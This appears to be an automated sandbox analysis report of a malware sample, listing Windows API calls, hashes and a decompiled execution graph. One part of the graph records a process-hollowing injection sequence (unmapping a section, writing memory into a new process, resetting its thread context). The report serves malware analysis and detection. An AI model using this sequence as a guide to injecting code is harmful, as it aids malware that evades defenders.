                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
                                                                                                                                                                      • Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00421060 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 244timememorynetworkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00421092
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 0042109A
                                                                                                                                                                      • GetConsoleAliasesW.KERNEL32(00000000,00000000,00000000), ref: 004210A6
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 004210C2
                                                                                                                                                                      • ResetEvent.KERNEL32(00000000), ref: 00421107
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00421120
                                                                                                                                                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0042114E
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00421156
                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 00421165
                                                                                                                                                                      • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 00421171
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(00000000), ref: 00421182
                                                                                                                                                                      • GetModuleHandleExA.KERNEL32(00000000,0042A3F0,?), ref: 0042119F
                                                                                                                                                                      • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 004211EB
                                                                                                                                                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004211FD
                                                                                                                                                                      • DnsHostnameToComputerNameA.KERNEL32(0042A408,?,?), ref: 00421216
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042122C
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 0042123F
                                                                                                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000000,00000000), ref: 00421298
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 004212A0
                                                                                                                                                                      • MoveFileExW.KERNEL32(0042A484,0042A410,00000000), ref: 004212B2
                                                                                                                                                                      • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004212BE
                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,0042A4A8,00000000,0042A48C,00000000), ref: 004212D6
                                                                                                                                                                      • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 004212E0
                                                                                                                                                                        • Part of subcall function 00420FB0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00420FEB
                                                                                                                                                                        • Part of subcall function 00420FB0: ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00421008
                                                                                                                                                                        • Part of subcall function 00420FB0: CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042101E
                                                                                                                                                                        • Part of subcall function 00420FB0: FileTimeToLocalFileTime.KERNEL32 ref: 0042103E
                                                                                                                                                                      • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 0042141B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658606089.0000000000413000.00000020.00000001.01000000.00000005.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_413000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$DirectoryFile$AliasesConsoleCreateCurrentEnvironmentEventFreeInfoLocalOpenProcessStrings$ByteCharCommCompareComputerConfigCountDateDefaultEnumErrorFormatsHandleHeapsHostnameIncrementInterlockedLastLengthLocaleModuleMoveMultiNameNamedObjectPipeReadResetSizeSpecificStartupStringSystemTickTimerWaitableWideWorking
                                                                                                                                                                      • String ID: tl_
                                                                                                                                                                      • API String ID: 3965127379-2653253968
                                                                                                                                                                      • Opcode ID: 6ee82755cd10cf319fdfd8f29cf3dbc211cc1ced95e99afee6c4bc9845ccf9a9
                                                                                                                                                                      • Instruction ID: 4a4c08fefbaece2af6b0b121e799fa951424239d93ca7334db3a2d95049d94ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ee82755cd10cf319fdfd8f29cf3dbc211cc1ced95e99afee6c4bc9845ccf9a9
                                                                                                                                                                      • Instruction Fuzzy Hash: 76A18370B44324EBE724DF50EC4AB9D77B0BB14705F9080BAE609661E0DBB41A89CF5E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00420FB0 Relevance: 6.0, APIs: 4, Instructions: 50pipetimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00420EF0: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00420F07
                                                                                                                                                                        • Part of subcall function 00420EF0: LoadLibraryA.KERNEL32(00000000), ref: 00420F0F
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00420FEB
                                                                                                                                                                      • ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00421008
                                                                                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042101E
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32 ref: 0042103E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658606089.0000000000413000.00000020.00000001.01000000.00000005.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_413000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTime$AllocateCreateEnvironmentEventFreeHeapLibraryLoadLocalNamedPipeReadStrings
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3811978434-0
                                                                                                                                                                      • Opcode ID: 7253bc6bf175576f58a7ba9c5ab029a83c8e781c64d547ea6e26a6b51f192e90
                                                                                                                                                                      • Instruction ID: b286ce8c588fc6cc5be4cee3ce191696b106358ee3b957089513613f40add585
                                                                                                                                                                      • Opcode Fuzzy Hash: 7253bc6bf175576f58a7ba9c5ab029a83c8e781c64d547ea6e26a6b51f192e90
                                                                                                                                                                      • Instruction Fuzzy Hash: 420152713443019FD320DF64EC86F9A77E4BB98705F81482DF245861A1DBB4954D8B6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004221EB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658606089.0000000000413000.00000020.00000001.01000000.00000005.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_413000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                      • Instruction ID: 2832a0796618cb4f6f256ea13b1b206b47b28915197736d1bd9fbe6573138a96
                                                                                                                                                                      • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                      • Instruction Fuzzy Hash: 15116D3214015EFBCF165E84ED01CEE3F22BB19354B998456FE1869131C37BC9B2AB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:3.2%
                                                                                                                                                                      Signature Coverage:2%
                                                                                                                                                                      Total number of Nodes:1192
                                                                                                                                                                      Total number of Limit Nodes:27
                                                                                                                                                                      execution_graph 11280 2625026 11281 2625035 11280->11281 11284 26257c6 11281->11284 11287 26257e1 11284->11287 11285 26257ea CreateToolhelp32Snapshot 11286 2625806 Module32First 11285->11286 11285->11287 11288 2625815 11286->11288 11289 262503e 11286->11289 11287->11285 11287->11286 11291 2625485 11288->11291 11292 26254b0 11291->11292 11293 26254c1 VirtualAlloc 11292->11293 11294 26254f9 11292->11294 11293->11294 11295 27e0000 11298 27e0630 11295->11298 11297 27e0005 11299 27e064c 11298->11299 11301 27e1577 11299->11301 11304 27e05b0 11301->11304 11307 27e05dc 11304->11307 11305 27e061e 11306 27e05e2 GetFileAttributesA 11306->11307 11307->11305 11307->11306 11309 27e0420 11307->11309 11310 27e04f3 11309->11310 11311 27e04ff CreateWindowExA 11310->11311 11312 27e04fa 11310->11312 11311->11312 11313 27e0540 PostMessageA 11311->11313 11312->11307 11314 27e055f 11313->11314 11314->11312 11316 27e0110 VirtualAlloc GetModuleFileNameA 11314->11316 11317 27e017d CreateProcessA 11316->11317 11318 27e0414 11316->11318 11317->11318 11320 27e025f VirtualFree VirtualAlloc Wow64GetThreadContext 11317->11320 11318->11314 11320->11318 11321 27e02a9 ReadProcessMemory 11320->11321 11322 27e02e5 VirtualAllocEx NtWriteVirtualMemory 11321->11322 11323 27e02d5 NtUnmapViewOfSection 11321->11323 11326 27e033b 11322->11326 11323->11322 11324 27e039d WriteProcessMemory Wow64SetThreadContext ResumeThread 11327 27e03fb ExitProcess 11324->11327 11325 27e0350 NtWriteVirtualMemory 11325->11326 11326->11324 11326->11325 11329 4014bf 11379 401de0 11329->11379 11331 4014cb GetStartupInfoW 11332 4014df HeapSetInformation 11331->11332 11334 4014ea 11331->11334 11332->11334 11380 40431b HeapCreate 11334->11380 11335 401538 11336 401543 11335->11336 11445 40144f 11335->11445 11453 4041a0 GetModuleHandleW 11336->11453 11339 401549 11340 401555 __RTC_Initialize 11339->11340 11341 40154d 11339->11341 11381 403b0c GetStartupInfoW 11340->11381 11342 40144f _fast_error_exit 66 API calls 11341->11342 11343 401554 11342->11343 11343->11340 11346 401566 11478 401dbe 11346->11478 11347 40156e GetCommandLineA 11394 403a75 GetEnvironmentStringsW 11347->11394 11353 401588 11354 401594 11353->11354 11355 40158c 11353->11355 11407 403735 11354->11407 11356 401dbe __amsg_exit 66 API calls 11355->11356 11358 401593 11356->11358 11358->11354 11359 401599 11360 4015a5 11359->11360 11361 40159d 11359->11361 11423 401b9d 11360->11423 11362 401dbe __amsg_exit 66 API calls 11361->11362 11364 4015a4 11362->11364 11364->11360 11365 4015ac 11366 4015b1 11365->11366 11367 4015b8 11365->11367 11368 401dbe __amsg_exit 66 API calls 11366->11368 11429 4036d6 11367->11429 11370 4015b7 11368->11370 11370->11367 11371 4015bd 11372 4015c3 11371->11372 11435 5cbf60 11371->11435 11372->11371 11379->11331 11380->11335 11502 401955 11381->11502 11383 401562 11383->11346 11383->11347 11384 403c9f 11385 403cd5 GetStdHandle 11384->11385 11388 403d39 SetHandleCount 11384->11388 11389 403ce7 GetFileType 11384->11389 11392 403d0d InitializeCriticalSectionAndSpinCount 11384->11392 11385->11384 11386 403b2a 11386->11383 11386->11384 11387 401955 __calloc_crt 66 API calls 11386->11387 11393 403c1f 11386->11393 11387->11386 11388->11383 11389->11384 11390 403c56 InitializeCriticalSectionAndSpinCount 11390->11383 11390->11393 11391 403c4b GetFileType 11391->11390 11391->11393 11392->11383 11392->11384 11393->11384 11393->11390 11393->11391 11396 403a91 11394->11396 11397 40157e 11394->11397 11395 403aa6 WideCharToMultiByte 11398 403ac6 11395->11398 11399 403afe FreeEnvironmentStringsW 11395->11399 11396->11395 11396->11396 11485 4039ba 11397->11485 11400 401910 __malloc_crt 66 API calls 11398->11400 11399->11397 11401 403acc 11400->11401 11401->11399 11402 403ad4 WideCharToMultiByte 11401->11402 11403 403af2 FreeEnvironmentStringsW 11402->11403 11404 403ae6 11402->11404 11403->11397 11405 405342 _free 66 API calls 11404->11405 11406 403aee 11405->11406 11406->11403 11408 40373e 11407->11408 11411 403743 _strlen 11407->11411 11728 405d7e 11408->11728 11409 403751 11409->11359 11411->11409 11412 401955 __calloc_crt 66 API calls 11411->11412 11416 403778 _strlen 11412->11416 11413 4037c7 11414 405342 _free 66 API calls 11413->11414 11414->11409 11415 401955 __calloc_crt 66 API calls 11415->11416 11416->11409 11416->11413 11416->11415 11417 4037ed 11416->11417 11420 403804 11416->11420 11732 408de1 11416->11732 11419 405342 _free 66 API calls 11417->11419 11419->11409 11421 4030e2 __invoke_watson 10 API calls 11420->11421 11422 403810 11421->11422 11422->11359 11424 401bab __IsNonwritableInCurrentImage 11423->11424 12181 40506f 11424->12181 11426 401bc9 __initterm_e 11428 401bea __IsNonwritableInCurrentImage 11426->11428 12184 401286 11426->12184 11428->11365 11430 4036e4 11429->11430 11433 4036e9 11429->11433 11431 405d7e ___initmbctable 94 API calls 11430->11431 11431->11433 11432 403725 11432->11371 11433->11432 12249 408d30 11433->12249 11437 5cbf6a __write_nolock 11435->11437 11436 5cbf9d GetSystemTimes 11436->11437 11437->11436 11439 5cbfad 11437->11439 11438 5cbfc7 FlushFileBuffers GetVolumeInformationW 11438->11439 11439->11438 11440 5cc032 11439->11440 12255 5cbb00 11440->12255 11446 401462 11445->11446 11447 40145d 11445->11447 11449 40335e __NMSG_WRITE 66 API calls 11446->11449 11448 40350d __FF_MSGBANNER 66 API calls 11447->11448 11448->11446 11450 40146a 11449->11450 11451 401a9f __mtinitlocknum 3 API calls 11450->11451 11452 401474 11451->11452 11452->11336 11454 4041b4 11453->11454 11455 4041bd GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11453->11455 12621 403e73 11454->12621 11457 404207 TlsAlloc 11455->11457 11460 404255 TlsSetValue 11457->11460 11461 404316 11457->11461 11460->11461 11462 404266 11460->11462 11461->11339 12631 401ac9 11462->12631 11467 404311 11469 403e73 __mtterm 70 API calls 11467->11469 11468 4042ae DecodePointer 11470 4042c3 11468->11470 11469->11461 11470->11467 11471 401955 __calloc_crt 66 API calls 11470->11471 11472 4042d9 11471->11472 11472->11467 11473 4042e1 DecodePointer 11472->11473 11474 4042f2 11473->11474 11474->11467 11475 4042f6 11474->11475 11476 403eb0 __getptd_noexit 66 API calls 11475->11476 11477 4042fe GetCurrentThreadId 11476->11477 11477->11461 11479 40350d __FF_MSGBANNER 66 API calls 11478->11479 11480 401dc8 11479->11480 11481 40335e __NMSG_WRITE 66 API calls 11480->11481 11482 401dd0 11481->11482 12642 401d8a 11482->12642 11486 4039d4 GetModuleFileNameA 11485->11486 11487 4039cf 11485->11487 11489 4039fb 11486->11489 11488 405d7e ___initmbctable 94 API calls 11487->11488 11488->11486 12675 403820 11489->12675 11491 403a57 11491->11353 11493 401910 __malloc_crt 66 API calls 11494 403a3d 11493->11494 11494->11491 11495 403820 _parse_cmdline 76 API calls 11494->11495 11495->11491 11504 40195e 11502->11504 11505 40199b 11504->11505 11506 40197c Sleep 11504->11506 11507 401853 11504->11507 11505->11386 11506->11504 11508 40185f 11507->11508 11513 40187a 11507->11513 11509 40186b 11508->11509 11508->11513 11516 40177e 11509->11516 11510 40188d HeapAlloc 11512 4018b4 11510->11512 11510->11513 11512->11504 11513->11510 11513->11512 11519 404452 DecodePointer 11513->11519 11521 403f64 GetLastError 11516->11521 11518 401783 11518->11504 11520 404467 11519->11520 11520->11513 11535 403e22 TlsGetValue 11521->11535 11524 403fd1 SetLastError 11524->11518 11525 401955 __calloc_crt 62 API calls 11526 403f8f 11525->11526 11526->11524 11527 403f97 DecodePointer 11526->11527 11528 403fac 11527->11528 11529 403fb0 11528->11529 11530 403fc8 11528->11530 11538 403eb0 11529->11538 11551 405342 11530->11551 11533 403fb8 GetCurrentThreadId 11533->11524 11534 403fce 11534->11524 11536 403e52 11535->11536 11537 403e37 DecodePointer TlsSetValue 11535->11537 11536->11524 11536->11525 11537->11536 11557 401de0 11538->11557 11540 403ebc GetModuleHandleW 11558 4047fa 11540->11558 11542 403efa InterlockedIncrement 11565 403f52 11542->11565 11545 4047fa __lock 64 API calls 11546 403f1b 11545->11546 11568 405d9c InterlockedIncrement 11546->11568 11548 403f39 11580 403f5b 11548->11580 11550 403f46 __alloc_osfhnd 11550->11533 11552 405376 _rand_s 11551->11552 11553 40534d HeapFree 11551->11553 11552->11534 11553->11552 11554 405362 11553->11554 11555 40177e __recalloc 64 API calls 11554->11555 11556 405368 GetLastError 11555->11556 11556->11552 11557->11540 11559 404822 EnterCriticalSection 11558->11559 11560 40480f 11558->11560 11559->11542 11583 404738 11560->11583 11562 404815 11562->11559 11563 401dbe __amsg_exit 65 API calls 11562->11563 11564 404821 11563->11564 11564->11559 11726 404709 LeaveCriticalSection 11565->11726 11567 403f14 11567->11545 11569 405dba InterlockedIncrement 11568->11569 11570 405dbd 11568->11570 11569->11570 11571 405dc7 InterlockedIncrement 11570->11571 11572 405dca 11570->11572 11571->11572 11573 405dd4 InterlockedIncrement 11572->11573 11574 405dd7 11572->11574 11573->11574 11575 405de1 InterlockedIncrement 11574->11575 11577 405de4 11574->11577 11575->11577 11576 405dfd InterlockedIncrement 11576->11577 11577->11576 11578 405e0d InterlockedIncrement 11577->11578 11579 405e18 InterlockedIncrement 11577->11579 11578->11577 11579->11548 11727 404709 LeaveCriticalSection 11580->11727 11582 403f62 11582->11550 11584 404744 __alloc_osfhnd 11583->11584 11585 40476a 11584->11585 11608 40350d 11584->11608 11593 40477a __alloc_osfhnd 11585->11593 11644 401910 11585->11644 11591 40479b 11596 4047fa __lock 65 API calls 11591->11596 11592 40478c 11595 40177e __recalloc 65 API calls 11592->11595 11593->11562 11595->11593 11598 4047a2 11596->11598 11599 4047d5 11598->11599 11600 4047aa InitializeCriticalSectionAndSpinCount 11598->11600 11601 405342 _free 65 API calls 11599->11601 11602 4047c6 11600->11602 11603 4047ba 11600->11603 11601->11602 11649 4047f1 11602->11649 11604 405342 _free 65 API calls 11603->11604 11606 4047c0 11604->11606 11607 40177e __recalloc 65 API calls 11606->11607 11607->11602 11652 408ad6 11608->11652 11610 403514 11611 403521 11610->11611 11612 408ad6 __FF_MSGBANNER 66 API calls 11610->11612 11613 40335e __NMSG_WRITE 66 API calls 11611->11613 11615 403543 11611->11615 11612->11611 11614 403539 11613->11614 11616 40335e __NMSG_WRITE 66 API calls 11614->11616 11617 40335e 11615->11617 11616->11615 11618 40337f __NMSG_WRITE 11617->11618 11620 408ad6 __FF_MSGBANNER 63 API calls 11618->11620 11640 40349b 11618->11640 11622 403399 11620->11622 11621 40350b 11641 401a9f 11621->11641 11623 4034aa GetStdHandle 11622->11623 11624 408ad6 __FF_MSGBANNER 63 API calls 11622->11624 11627 4034b8 _strlen 11623->11627 11623->11640 11625 4033aa 11624->11625 11625->11623 11626 4033bc 11625->11626 11626->11640 11659 408a73 11626->11659 11630 4034ee WriteFile 11627->11630 11627->11640 11630->11640 11631 4033e8 GetModuleFileNameW 11632 403409 11631->11632 11635 403415 _wcslen 11631->11635 11633 408a73 __NMSG_WRITE 63 API calls 11632->11633 11633->11635 11637 408916 63 API calls __NMSG_WRITE 11635->11637 11638 40348b 11635->11638 11668 4030e2 11635->11668 11671 40898b 11635->11671 11637->11635 11680 4087aa 11638->11680 11698 401114 11640->11698 11706 401a74 GetModuleHandleW 11641->11706 11646 401919 11644->11646 11647 40194f 11646->11647 11648 401930 Sleep 11646->11648 11709 4044b9 11646->11709 11647->11591 11647->11592 11648->11646 11725 404709 LeaveCriticalSection 11649->11725 11651 4047f8 11651->11593 11653 408ae2 11652->11653 11654 408aec 11653->11654 11655 40177e __recalloc 66 API calls 11653->11655 11654->11610 11656 408b05 11655->11656 11657 40314e __cftof_l 11 API calls 11656->11657 11658 408b10 11657->11658 11658->11610 11660 408a81 11659->11660 11661 408a88 11659->11661 11660->11661 11663 408aa9 11660->11663 11662 40177e __recalloc 66 API calls 11661->11662 11667 408a8d 11662->11667 11665 4033dd 11663->11665 11666 40177e __recalloc 66 API calls 11663->11666 11664 40314e __cftof_l 11 API calls 11664->11665 11665->11631 11665->11635 11666->11667 11667->11664 11669 402f85 __call_reportfault 8 API calls 11668->11669 11670 4030f4 GetCurrentProcess TerminateProcess 11669->11670 11670->11635 11676 40899d 11671->11676 11672 4089a1 11673 40177e __recalloc 66 API calls 11672->11673 11674 4089a6 11672->11674 11675 4089bd 11673->11675 11674->11635 11677 40314e __cftof_l 11 API calls 11675->11677 11676->11672 11676->11674 11678 4089e4 11676->11678 11677->11674 11678->11674 11679 40177e __recalloc 66 API calls 11678->11679 11679->11675 11681 403df0 _ctrlevent_capture@4 EncodePointer 11680->11681 11682 4087d0 11681->11682 11683 4087e0 LoadLibraryW 11682->11683 11684 40885d 11682->11684 11685 4088f5 11683->11685 11686 4087f5 GetProcAddress 11683->11686 11690 408877 DecodePointer DecodePointer 11684->11690 11693 40888a 11684->11693 11694 401114 __atoldbl_l 5 API calls 11685->11694 11686->11685 11689 40880b 7 API calls 11686->11689 11687 4088c0 DecodePointer 11688 4088e9 DecodePointer 11687->11688 11691 4088c7 11687->11691 11688->11685 11689->11684 11692 40884d GetProcAddress EncodePointer 11689->11692 11690->11693 11691->11688 11696 4088da DecodePointer 11691->11696 11692->11684 11693->11687 11693->11688 11697 4088ad 11693->11697 11695 408914 11694->11695 11695->11640 11696->11688 11696->11697 11697->11688 11699 40111c 11698->11699 11700 40111e IsDebuggerPresent 11698->11700 11699->11621 11702 4043ee __call_reportfault 11700->11702 11703 401703 SetUnhandledExceptionFilter UnhandledExceptionFilter 11702->11703 11704 401728 GetCurrentProcess TerminateProcess 11703->11704 11705 401720 __call_reportfault 11703->11705 11704->11621 11705->11704 11707 401a88 GetProcAddress 11706->11707 11708 401a98 ExitProcess 11706->11708 11707->11708 11710 404536 11709->11710 11717 4044c7 11709->11717 11711 404452 _malloc DecodePointer 11710->11711 11712 40453c 11711->11712 11713 40177e __recalloc 65 API calls 11712->11713 11716 40452e 11713->11716 11714 40350d __FF_MSGBANNER 65 API calls 11714->11717 11715 4044f5 HeapAlloc 11715->11716 11715->11717 11716->11646 11717->11714 11717->11715 11718 40335e __NMSG_WRITE 65 API calls 11717->11718 11719 404522 11717->11719 11720 404452 _malloc DecodePointer 11717->11720 11722 401a9f __mtinitlocknum GetModuleHandleW GetProcAddress ExitProcess 11717->11722 11723 404520 11717->11723 11718->11717 11721 40177e __recalloc 65 API calls 11719->11721 11720->11717 11721->11723 11722->11717 11724 40177e __recalloc 65 API calls 11723->11724 11724->11716 11725->11651 11726->11567 11727->11582 11729 405d87 11728->11729 11730 405d8e 11728->11730 11741 405be4 11729->11741 11730->11411 11733 408def 11732->11733 11736 408df6 11732->11736 11733->11736 11738 408e14 11733->11738 11734 40177e __recalloc 66 API calls 11735 408dfb 11734->11735 12172 40314e 11735->12172 11736->11734 11739 408e05 11738->11739 11740 40177e __recalloc 66 API calls 11738->11740 11739->11416 11740->11735 11742 405bf0 __alloc_osfhnd 11741->11742 11772 403fdd 11742->11772 11746 405c03 11793 405941 11746->11793 11749 401910 __malloc_crt 66 API calls 11750 405c24 11749->11750 11751 405d43 __alloc_osfhnd 11750->11751 11800 4059bd 11750->11800 11751->11730 11754 405d50 11754->11751 11758 405d63 11754->11758 11760 405342 _free 66 API calls 11754->11760 11755 405c54 InterlockedDecrement 11756 405c64 11755->11756 11757 405c75 InterlockedIncrement 11755->11757 11756->11757 11762 405342 _free 66 API calls 11756->11762 11757->11751 11759 405c8b 11757->11759 11761 40177e __recalloc 66 API calls 11758->11761 11759->11751 11764 4047fa __lock 66 API calls 11759->11764 11760->11758 11761->11751 11763 405c74 11762->11763 11763->11757 11766 405c9f InterlockedDecrement 11764->11766 11767 405d1b 11766->11767 11768 405d2e InterlockedIncrement 11766->11768 11767->11768 11770 405342 _free 66 API calls 11767->11770 11810 405d45 11768->11810 11771 405d2d 11770->11771 11771->11768 11773 403f64 __getptd_noexit 66 API calls 11772->11773 11774 403fe5 11773->11774 11775 403ff2 11774->11775 11776 401dbe __amsg_exit 66 API calls 11774->11776 11777 40589d 11775->11777 11776->11775 11778 4058a9 __alloc_osfhnd 11777->11778 11779 403fdd __getptd 66 API calls 11778->11779 11780 4058ae 11779->11780 11781 4047fa __lock 66 API calls 11780->11781 11789 4058c0 11780->11789 11782 4058de 11781->11782 11783 405927 11782->11783 11786 4058f5 InterlockedDecrement 11782->11786 11787 40590f InterlockedIncrement 11782->11787 11813 405938 11783->11813 11784 401dbe __amsg_exit 66 API calls 11788 4058ce __alloc_osfhnd 11784->11788 11786->11787 11790 405900 11786->11790 11787->11783 11788->11746 11789->11784 11789->11788 11790->11787 11791 405342 _free 66 API calls 11790->11791 11792 40590e 11791->11792 11792->11787 11817 402284 11793->11817 11796 405960 GetOEMCP 11799 405970 11796->11799 11797 40597e 11798 405983 GetACP 11797->11798 11797->11799 11798->11799 11799->11749 11799->11751 11801 405941 getSystemCP 78 API calls 11800->11801 11803 4059dd 11801->11803 11802 4059e8 setSBCS 11804 401114 __atoldbl_l 5 API calls 11802->11804 11803->11802 11806 405a2c IsValidCodePage 11803->11806 11809 405a51 _memset __setmbcp_nolock 11803->11809 11805 405ba4 11804->11805 11805->11754 11805->11755 11806->11802 11807 405a3e GetCPInfo 11806->11807 11807->11802 11807->11809 12110 40570d GetCPInfo 11809->12110 12171 404709 LeaveCriticalSection 11810->12171 11812 405d4c 11812->11751 11816 404709 LeaveCriticalSection 11813->11816 11815 40593f 11815->11789 11816->11815 11818 402297 11817->11818 11822 4022e4 11817->11822 11819 403fdd __getptd 66 API calls 11818->11819 11820 40229c 11819->11820 11821 4022c4 11820->11821 11825 40605c 11820->11825 11821->11822 11824 40589d __setmbcp 68 API calls 11821->11824 11822->11796 11822->11797 11824->11822 11826 406068 __alloc_osfhnd 11825->11826 11827 403fdd __getptd 66 API calls 11826->11827 11828 40606d 11827->11828 11829 40609b 11828->11829 11831 40607f 11828->11831 11830 4047fa __lock 66 API calls 11829->11830 11832 4060a2 11830->11832 11833 403fdd __getptd 66 API calls 11831->11833 11840 40600f 11832->11840 11835 406084 11833->11835 11837 406092 __alloc_osfhnd 11835->11837 11839 401dbe __amsg_exit 66 API calls 11835->11839 11837->11821 11839->11837 11841 406051 11840->11841 11842 40601c 11840->11842 11848 4060c9 11841->11848 11842->11841 11843 405d9c ___addlocaleref 8 API calls 11842->11843 11844 406032 11843->11844 11844->11841 11851 405e2b 11844->11851 12109 404709 LeaveCriticalSection 11848->12109 11850 4060d0 11850->11835 11852 405e3c InterlockedDecrement 11851->11852 11853 405ebf 11851->11853 11854 405e51 InterlockedDecrement 11852->11854 11855 405e54 11852->11855 11853->11841 11865 405ec4 11853->11865 11854->11855 11856 405e61 11855->11856 11857 405e5e InterlockedDecrement 11855->11857 11858 405e6b InterlockedDecrement 11856->11858 11859 405e6e 11856->11859 11857->11856 11858->11859 11860 405e78 InterlockedDecrement 11859->11860 11862 405e7b 11859->11862 11860->11862 11861 405e94 InterlockedDecrement 11861->11862 11862->11861 11863 405eaf InterlockedDecrement 11862->11863 11864 405ea4 InterlockedDecrement 11862->11864 11863->11853 11864->11862 11866 405f48 11865->11866 11867 405edb 11865->11867 11868 405f95 11866->11868 11869 405342 _free 66 API calls 11866->11869 11867->11866 11876 405342 _free 66 API calls 11867->11876 11893 405f0f 11867->11893 11878 405fbe 11868->11878 11935 40aa43 11868->11935 11871 405f69 11869->11871 11873 405342 _free 66 API calls 11871->11873 11879 405f7c 11873->11879 11874 405342 _free 66 API calls 11880 405f3d 11874->11880 11875 406003 11881 405342 _free 66 API calls 11875->11881 11882 405f04 11876->11882 11877 405342 _free 66 API calls 11877->11878 11878->11875 11884 405342 66 API calls _free 11878->11884 11885 405342 _free 66 API calls 11879->11885 11886 405342 _free 66 API calls 11880->11886 11887 406009 11881->11887 11895 40b0c0 11882->11895 11883 405342 _free 66 API calls 11889 405f25 11883->11889 11884->11878 11890 405f8a 11885->11890 11886->11866 11887->11841 11923 40ae67 11889->11923 11892 405342 _free 66 API calls 11890->11892 11892->11868 11893->11883 11894 405f30 11893->11894 11894->11874 11896 40b0d1 11895->11896 11922 40b1ba 11895->11922 11897 40b0e2 11896->11897 11898 405342 _free 66 API calls 